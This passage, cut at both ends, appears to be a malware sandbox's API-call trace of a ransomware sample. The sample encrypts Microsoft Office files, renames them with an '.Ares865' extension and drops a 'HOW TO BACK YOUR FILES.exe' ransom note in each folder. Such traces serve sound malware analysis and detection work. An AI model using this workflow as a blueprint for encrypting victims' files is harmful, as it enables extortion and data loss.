dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f00d8) returned 1 [0069.650] CryptGenRandom (in: hProv=0x2f00d8, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.650] CryptReleaseContext (hProv=0x2f00d8, dwFlags=0x0) returned 1 [0069.675] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.675] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.675] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.676] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML.Ares865") returned 71 [0069.676] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn107.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn107.xml.ares865"), dwFlags=0x1) returned 1 [0069.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN107.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn107.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.677] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=2652) returned 1 [0069.677] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.678] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.678] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.680] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.681] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.681] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.681] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML.Ares865") returned 71 [0069.681] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn108.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn108.xml.ares865"), dwFlags=0x1) returned 1 [0069.682] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN108.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn108.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.682] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=13528) returned 1 [0069.682] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.683] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.683] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.687] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.687] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.687] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.688] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML.Ares865") returned 71 [0069.688] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn109.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn109.xml.ares865"), dwFlags=0x1) returned 1 [0069.690] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN109.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn109.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.690] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=6818) returned 1 [0069.690] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.691] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.691] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.693] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.694] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.694] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.695] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML.Ares865") returned 71 [0069.695] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn110.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn110.xml.ares865"), dwFlags=0x1) returned 1 [0069.696] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN110.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn110.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.696] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=51936) returned 1 [0069.696] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.697] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.697] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.701] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.701] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.701] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.702] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML.Ares865") returned 71 [0069.703] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn111.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn111.xml.ares865"), dwFlags=0x1) returned 1 [0069.703] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PGMN111.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pgmn111.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.703] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=284562) returned 1 [0069.703] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.704] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.704] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.718] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.719] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.719] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.723] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML.Ares865") returned 72 [0069.723] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pg_index.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pg_index.xml.ares865"), dwFlags=0x1) returned 1 [0069.723] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\PAGESIZE\\PG_INDEX.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\pagesize\\pg_index.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0069.724] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=34700) returned 1 [0069.724] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0380) returned 1 [0069.724] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.724] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.729] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0380) returned 1 [0069.729] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.729] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0069.730] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover", iMaxLength=260 | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover") returned="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover" [0069.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0069.730] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7be8 | out: hHeap=0x2b0000) returned 1 [0069.730] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover") returned 62 [0069.730] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover" | out: lpString1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover") returned="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover" [0069.730] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0069.730] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\how to back your files.exe"), bFailIfExists=1) returned 1 [0069.736] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0069.736] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5133d8d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x5b11f580, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5b11f580, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccea8 [0069.736] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0069.736] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0069.738] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML.Ares865") returned 88 [0069.738] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\ameritech.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\ameritech.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.739] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\AMERITECH.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\ameritech.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.739] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=816) returned 1 [0069.740] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.740] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.740] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.744] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.745] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.745] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.746] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML.Ares865") returned 89 [0069.746] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btinternet.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btinternet.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.746] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTINTERNET.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btinternet.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.746] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=807) returned 1 [0069.747] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.747] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.747] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.750] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.751] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.751] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.751] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML.Ares865") returned 90 [0069.751] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btopenworld.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btopenworld.com.xml.ares865"), dwFlags=0x1) returned 1 [0069.753] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\BTOPENWORLD.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\btopenworld.com.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.753] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=807) returned 1 [0069.753] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.753] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.754] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.755] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.756] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.756] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.757] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML.Ares865") returned 84 [0069.757] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\flash.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\flash.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.758] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\FLASH.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\flash.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.758] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=808) returned 1 [0069.758] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.759] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.759] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.763] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.763] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.763] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.764] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML.Ares865") returned 88 [0069.764] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nl.rogers.com.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nl.rogers.com.xml.ares865"), dwFlags=0x1) returned 1 [0069.765] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NL.ROGERS.COM.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nl.rogers.com.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.765] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=818) returned 1 [0069.766] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.766] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.766] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.772] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.773] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.773] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.773] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML.Ares865") returned 85 [0069.773] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nvbell.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nvbell.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.774] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\NVBELL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\nvbell.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0069.775] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=810) returned 1 [0069.775] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0518) returned 1 [0069.775] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0069.775] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.778] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0069.779] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0069.779] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0069.779] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML.Ares865") returned 86 [0069.779] MoveFileExW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\pacbell.net.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\pacbell.net.xml.ares865"), dwFlags=0x1) returned 1 [0069.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\OutlookAutoDiscover\\PACBELL.NET.XML.Ares865" (normalized: "c:\\program files\\microsoft office\\office14\\outlookautodiscover\\pacbell.net.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, 